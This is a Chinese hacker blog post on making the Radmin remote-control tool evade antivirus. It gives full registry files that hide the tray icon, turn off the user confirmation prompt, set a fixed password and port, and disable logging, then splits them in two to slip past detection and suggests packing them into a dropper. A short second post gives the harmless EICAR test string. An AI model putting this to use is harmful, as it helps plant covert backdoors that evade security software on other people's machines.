作者 光之神谕 来源http://newblog.sohu.com/members/rayhac/
关于radmin的免杀处理说实在的radmin我很少使,用惯了反弹马,直连已经很不习惯了,但是这东西稳定,屏幕监视估计是最好的了,网管用起来做远程维护也比较简单,但是用的人太多了,就算是正常合法的远控,BT的杀毒也不放过了,好象卖咖啡~诺顿什么的早就把其报为危险对象了,一不小心就给杀咯.
r_server.exe
raddrv.dll
AdmDll.dll
↓
最简单的方法:加壳加花.(不会可以去死了)
密码配置信息.reg(有趣的是这个,杀毒连个注册表文件都不放过)
↓
完整的例子:
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:df,ac,59,ee,60,c7,c2,c8,5b,3d,74,dd,9d,f5,57,2b
"Port"=hex:15,1e,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
直接被杀猪啊~~~
免杀例子:分别写成两个reg文件,先后导入就OK
1.reg
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:df,ac,59,ee,60,c7,c2,c8,5b,3d,74,dd,9d,f5,57,2b
"Port"=hex:15,1e,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
2.reg
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:01,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:00,00,00,00
PS:思路就是这样,打包,批处理,做成资源释放形式什么的,随便你了,重要的是免杀了.
评论 (2) | 引用 (0) | 固定链接 | 发表于 00:47
提示:“固定链接”为您显示此篇文章的固定不变链接,如果您有还有疑问请点击帮助
链接地址:http://blog.sohu.com/members/rayhac/806465.html 复制此地址
引用地址:http://blog.sohu.com/trackback?id=806465 复制此地址
2006-01-28 | 一段小小的特征码把下面这段字符码复制到记事本里,保存为文本文件,然后用杀毒扫一扫
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
这段字符是欧洲计算机防病毒协会和反病毒软件厂家一同开发的一种测试文件,其中的特征码已经包含在各种杀毒软件的病毒代码库里,所以可以用做测试病毒扫描引擎。
PS:俺的卡吧小试了下,不知道国内的瑞星~KV之流有没有把这段特征入库呢?
你可以使用这个链接引用该篇文章 http://publishblog.blogchina.com/blog/tb.b?diaryID=4602205